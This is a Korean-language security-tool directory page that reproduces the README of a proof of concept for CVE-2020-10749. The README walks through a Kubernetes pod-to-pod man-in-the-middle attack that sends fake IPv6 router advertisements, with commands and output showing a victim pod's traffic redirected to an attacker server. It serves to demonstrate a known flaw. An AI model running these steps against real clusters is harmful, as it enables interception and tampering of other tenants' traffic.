Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2020-10749 — CVE-2020-10749에 대한 개념 증명 익스플로잇: IPv6 가짜 라우터 광고를 통한 파드 간 Kubernetes MitM 공격 시연. | Kitploit
도구/GitHubGitHub/knqyf263/cve-2020-10749
Container SecurityExploitationWeb Application ExploitationNetwork SecurityCloud Security
GitHubknqyf263/cve-2020-10749

CVE-2020-10749

CVE-2020-10749에 대한 개념 증명 익스플로잇: IPv6 가짜 라우터 광고를 통한 파드 간 Kubernetes MitM 공격 시연.

저장소 보기
251426년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2020-10749

CVE-2020-10749 PoC (IPv6 가짜 라우터 알림을 통한 Kubernetes MitM 공격)

교육 목적으로만 사용하십시오.

demo

요구사항

  • 다음 kubelet 버전을 사용하는 Kubernetes 클러스터
    • kubelet v1.18.0-v1.18.3
    • kubelet v1.17.0-v1.17.6
    • kubelet < v1.16.11

익스플로잇

피해자 Pod 배포

root@kitploit:~
$ kubectl apply -f victim/victim.yml
$  kubectl ge pods
NAME                       READY   STATUS    RESTARTS   AGE
victim-5484d9f977-pgtnh    1/1     Running   0          10s
$ kubectl exec -it victim-5484d9f977-pgtnh -- sh
/ # apk add curl
/ # ip -6 a show eth0
3: eth0@if25: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1450 state UP
    inet6 fe80::3c07:afff:feb5:7219/64 scope link
        valid_lft forever preferred_lft forever
/ # ip -6 route
fe80::/64 dev eth0  metric 256
ff00::/8 dev eth0  metric 256
$ curl http://example.com

공격자 Pod 배포

root@kitploit:~
$ kubectl apply -f attacker/attacker.yml
$ kubectl get pods
NAME                       READY   STATUS    RESTARTS   AGE
attacker-8857dd5c9-pnzjw   1/1     Running   0          50s
victim-5484d9f977-pgtnh    1/1     Running   0          10s

가짜 라우터 알림 메시지 보내기

root@kitploit:~
$ kubectl exec -it attacker-8857dd5c9-pnzjw -- sh
/ # ip a show eth0 | grep "link/ether" | awk '{print $2}'
aa:ca:d1:91:8f:23
/ # sed -i 's/\[YOUR_MAC_ADDR\]/aa:ca:d1:91:8f:23/g' fake_ra.py
/ # python fake_ra.py
Sending a fake router advertisement message...
.
Sent 1 packets.

가짜 서버 실행

root@kitploit:~
$ kubectl exec -it attacker-8857dd5c9-pnzjw -- sh
/ # python server.py
Listening...

정상 웹 사이트에 접속

새 IPv6 주소와 기본 게이트웨이가 추가되었는지 확인합니다.

root@kitploit:~
$ kubectl exec -it victim-5484d9f977-pgtnh -- sh
/ # ip -6 a show eth0
3: eth0@if27: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1450 state UP
    inet6 2001:db8:1:0:1854:9aff:fe75:2368/64 scope global dynamic
           valid_lft forever preferred_lft forever
               inet6 fe80::1854:9aff:fe75:2368/64 scope link
                      valid_lft forever preferred_lft forever
/ # ip -6 route
2001:db8:1::/64 dev eth0  metric 256
fe80::/64 dev eth0  metric 256
default via fe80::42:fcff:dead:beef dev eth0  metric 1024  expires 0sec
ff00::/8 dev eth0  metric 256
/ # curl http://example.com
malicious!!!!!!!

참고

  • https://github.com/kubernetes/kubernetes/issues/91507

작성자

Teppei Fukuda

도구 다운로드